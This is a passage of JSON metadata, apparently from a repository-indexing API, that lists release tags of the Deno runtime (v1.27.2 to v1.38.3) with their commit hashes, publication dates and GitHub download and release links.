deno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api